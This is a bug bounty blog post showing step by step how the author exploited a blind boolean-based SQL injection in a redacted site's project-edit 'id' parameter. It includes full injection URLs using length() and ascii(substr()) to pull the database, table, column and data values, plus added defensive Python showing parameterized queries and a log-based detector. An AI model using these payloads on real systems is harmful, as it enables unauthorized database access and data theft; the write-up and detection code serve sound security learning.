A Straight 5-hour Escalation! Exploiting Boolean-Based SQL Injection.👽
Hi, Ajak Amico here, welcome back to another blog. Today I will explain how I exploited a Boolean-based SQLi, which took me about 5 hours straight. Before starting, if you haven’t subscribed to our channel, do subscribe, guys. Contents related to cyber security, Bug Bounty, and Digital Forensics Investigation.👇
Follow our YouTube Channel: @ajakcybersecurity (321 Videos)
Follow on Instagram: @ajakcybersecurity
What was my recon process?
So basically, before doing active and passive recon on a target, I first analyze the target: how it works, how it has been designed, what technology has been implemented, and what features it offers. That was the case here too!
So I was just crawling and analyzing the site to understand what it was all about!
So I found a tab called Project, as follows:
When you edit the project, you get a parameter like this:
https://redacted.com/projects/projects-edit.html?id=879
So, simply, I triggered an error with a single quote (‘):
https://redacted.com/projects/projects-edit.html?id=879'
It showed a 500 status code (Internal Server Error).
So next I was trying to balance the query to get the 200 response back! Balanced query:
https://redacted.com/projects/projects-edit.html?id=879 -- -
Ok! So now I stopped my recon and started to work on exploiting the SQLi, because P1 flaws are always special, and there is a high chance that it will turn out to be a duplicate too!
How I exploited the Blind Boolean-based SQL Injection
First, I tried union-based SQLi, but the site redirected me to its main page. Next, I tried blind boolean-based SQLi, and luckily it worked!👍
If the injected condition is false, the site returns a 301 status code; if the condition is true, it returns a 200 response (this held throughout the exploitation).
Confirming blind Boolean-based SQLi:
False query:
https://redacted.com/projects/projects-edit.html?id=879 AND 1=2 -- -
True query:
https://redacted.com/projects/projects-edit.html?id=879 AND 1=1 -- -
Using Wappalyzer, I found that the backend was running MySQL, and the responses above confirmed that the URL was vulnerable to blind boolean-based SQLi!
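To show where the 200/301 oracle comes from and how to close it, here is an added example that is not code from the site or from this write-up: a Python stand-in that uses SQLite in place of the site's MySQL backend, with the vulnerable string-concatenated query next to a validated, parameterized one. The table, row and column names are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the site's backend (assumption: the real
# schema is unknown, only the observed behaviour is modelled).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE projects (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO projects VALUES (879, 'demo project');
""")


def load_project_vulnerable(raw_id: str):
    """The pattern the write-up implies: the id parameter is concatenated
    straight into the query, so 'id=879 AND 1=2 -- -' rewrites the WHERE
    clause and the row count becomes an attacker-controlled true/false oracle."""
    sql = "SELECT id, name FROM projects WHERE id = " + raw_id
    return conn.execute(sql).fetchone()


def load_project_safe(raw_id: str):
    """Hardened form: validate the type first, then bind a parameter so the
    value can never be parsed as SQL. Anything that is not a plain integer
    is rejected before it reaches the database."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, name FROM projects WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchone()


def oracle_leaks(loader) -> bool:
    """Do the TRUE/FALSE payloads from the write-up produce different results?
    For the vulnerable loader they do (row vs. no row); for the safe loader
    both are rejected identically, so there is nothing left to infer."""
    payloads = ("879 AND 1=1 -- -", "879 AND 1=2 -- -")
    results = []
    for payload in payloads:
        try:
            results.append(loader(payload))
        except (ValueError, sqlite3.Error):
            results.append("rejected")
    return results[0] != results[1]
```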
Retrieving the length of the database name:
Ok! It’s time to get the database name! First, I checked the length of the database name as follows:
FALSE query:
https://redacted.com/projects/projects-edit.html?id=879 AND(length(database()))=1 -- -
The above query checks whether the length of the database name is equal to 1: if true, it returns a 200 response; if false, it returns a 301 response!
TRUE query:
https://redacted.com/projects/projects-edit.html?id=879 AND(length(database()))=12 -- -
So I found that the database name is 12 characters long!
Retrieving the characters of the database name:
Next, we are going to get the characters of the database name one by one. For this we will use an ASCII table to find the ASCII value of each character.
So basically, we will be recovering the characters through their ASCII values.
Finding the first letter of the database name:
Now capture the following URL in the Intruder tab, set positions and payloads, and start the attack!
FALSE QUERY:
https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),1,1)))=97 -- -
TRUE QUERY:
https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),1,1)))=121 -- -
Intruder will check the values from 97 to 125. When it finds the correct character, it shows a 200 response; otherwise it throws a 301 response.
The first letter in the database!
You can see the 200 response comes on the 121st payload, which means the first letter of the database name has ASCII value 121; checking the ASCII table, 121 is “y”.
Now the second letter!
FALSE query:
https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),2,1))) = 100 -- -
TRUE Query:
https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),2,1))) = 111 -- -
The same Intruder process applies here too: when it finds the correct character, it shows a 200 response; otherwise it throws a 301 response.
The second letter in the database name
You can see the 200 response comes on the 111th payload, which means the second letter of the database name has ASCII value 111; checking the ASCII table, 111 is “o”.
So by using this method I was able to retrieve all 12 characters!
(121 - y)
(111 - o)
(117 - u)
(114 - r)
(98 - b)
(117 - u)
(115 - s)
(105 - i)
(110 - n)
(101 - e)
(115 - s)
(115 - s)
The database name was “yourbusiness”.
Retrieving tables:
First, we are going to get the length of the table name; for that, we use the following query:
FALSE Query:
https://redacted.com/projects/projects-edit.html?id=879 AND (length((select table_name from information_schema.tables where table_schema="yourbusiness" limit 0,1))) = 1 -- -
TRUE Query:
https://redacted.com/projects/projects-edit.html?id=879 AND (length((select table_name from information_schema.tables where table_schema="yourbusiness" limit 0,1))) = 7 -- -
The above query checks whether the length of the table name is equal to 1: if true, it returns a 200 response; if false, it returns a 301 response!
Length of the table
Just to confirm, I similarly enumerated the fourth table, using the following query to test whether the length of the fourth table name equals the guessed value (true or false)!
TRUE Query:
https://redacted.com/projects/projects-edit.html?id=879 AND (length((select table_name from information_schema.tables where table_schema=database() limit 4,1))) = 18 -- -
Retrieving the characters of the table name:
The same method we used to get the database name applies here too! Send the following query to the Intruder tab, set positions and payloads, and start the attack!
TRUE Query:
https://redacted.com/projects/projects-edit.html?id=879 AND (ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="yourbusiness" LIMIT 0,1),1,1))) = 97 -- -
The first letter in Table
According to the ASCII table, value 97 is “a”, which means the first letter of the table name is “a”.
Retrieving the second letter of the table name:
True Query:
https://redacted.com/projects/projects-edit.html?id=879 AND (ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="yourbusiness" LIMIT 0,1),2,1))) = 100 -- -
The second letter in the table!
According to the ASCII table, value 100 is “d”, which means the second letter of the table name is “d”.
So by using this method, I retrieved all 7 characters!
(97 - a)
(100 - d)
(100 - d)
(114 - r)
(101 - e)
(115 - s)
(115 - s)
The table name was “address”.
Retrieving columns of the database:
So, as usual, first find out the length of the column name:
https://redacted.com/projects/projects-edit.html?id=879 AND (length((select column_name from information_schema.COLUMNS where table_schema=database() limit 0,1))) = 5 -- -
The column name was 5 characters long. Using the same Intruder method as above, I was able to get the column name as well. The query for the first letter of the column name is as follows:
True Query:
https://redacted.com/projects/projects-edit.html?id=879 AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="address" LIMIT 0,1),1,1))) = 112 -- -
So by this method, I was able to get the column name too:
(112 - p)
(108 - l)
(97 - a)
(99 - c)
(101 - e)
The column name was “Place”.
Finally, retrieving data!
Generally, the lowercase ASCII letters start at 97 (a) and end at 122 (z), so assuming that, I used the same Intruder method as above to get the data. Surprisingly, it showed 500 responses! This means the first character of the data does not fall in the lowercase range.
So I started to check with capital letters, and luckily it was a YES! The first letter was a capital (uppercase).
The first letter in the data
So the first letter was “S”. Using this method, I got all the data too! It was as follows:
(83 - S) (caps)
(116 - t)
(114 - r)
(97 - a)
(100 - d)
(97 - a)
(32 - space)
(83 - S) (caps)
(116 - t)
(114 - r)
(101 - e)
(101 - e)
(116 - t)
It was “Strada Street”.
Gotcha! This was enough to prepare a good report for the company 😉
Yes! It took me 5 hours straight, yet it was completely interesting and a bit hard to exploit this SQLi! 😁
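From the defender’s side, a character-by-character sweep like the one above leaves a distinctive trail in the web server’s access log. The following added example (not code from this write-up or from the site) runs simple payload signatures and per-client counting over constructed log lines modelled on the probes described here; the log format, client addresses and the signature set are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the real target). They mimic the
# probes in the write-up: a lone quote, the 1=2 check, then an Intruder sweep
# over ASCII values for one character of the database name.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "GET /projects/projects-edit.html?id=879 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:10:00:02 +0000] "GET /projects/projects-edit.html?id=879' HTTP/1.1" 500 0
203.0.113.5 - - [10/Oct/2023:10:00:03 +0000] "GET /projects/projects-edit.html?id=879%20AND%201=2%20--%20- HTTP/1.1" 301 0
203.0.113.5 - - [10/Oct/2023:10:00:04 +0000] "GET /projects/projects-edit.html?id=879%20AND(ascii(substr((select%20database()),1,1)))=97%20--%20- HTTP/1.1" 301 0
203.0.113.5 - - [10/Oct/2023:10:00:05 +0000] "GET /projects/projects-edit.html?id=879%20AND(ascii(substr((select%20database()),1,1)))=121%20--%20- HTTP/1.1" 200 5120
198.51.100.9 - - [10/Oct/2023:10:00:06 +0000] "GET /projects/projects-edit.html?id=880 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) \S+" (?P<status>\d{3})')

# Payload shapes used in the write-up, matched against the decoded id value.
SIGNATURES = {
    "boolean_probe": re.compile(r"\bAND\s*\(?\s*\d+\s*=\s*\d+", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substr", re.I),
    "schema_enum": re.compile(r"information_schema\.|length\s*\(\s*database\s*\(", re.I),
}


def analyse(log_text: str):
    """Return (findings, per_ip): one (ip, status, tag) per suspicious request,
    plus a count of tagged requests per client, so a sweep of dozens of
    near-identical requests from one address stands out as a whole."""
    findings = []
    per_ip = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["url"]).query
        value = parse_qs(query, keep_blank_values=True).get("id", [""])[0]
        tags = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        # An id that should be numeric but is not (the lone quote on the first
        # probe) is the earliest signal, even when no known payload matches.
        if value and not value.isdigit() and not tags:
            tags.append("non_numeric_id")
        findings.extend((m["ip"], int(m["status"]), t) for t in tags)
        if tags:
            per_ip[m["ip"]] += 1
    return findings, dict(per_ip)
```

In a real deployment the per-client count would be compared against a threshold per time window, and the alternating 200/301 statuses on the flagged requests are themselves a useful confirmation that an oracle is being exercised.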
Bug bounty tips:
Before doing recon on a site, just analyze it: what the site is all about and what features have been implemented. There is a high chance you will find business logic flaws!
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Hope you have learned something from this blog; if so, kindly press the follow button for further updates.
Best wishes from Ajak Cybersecurity.❤️
“Learn it, then spread it🔥”
Learn Everyday, Happy Hacking 😁🙌
https://www.buymeacoffee.com/Ajak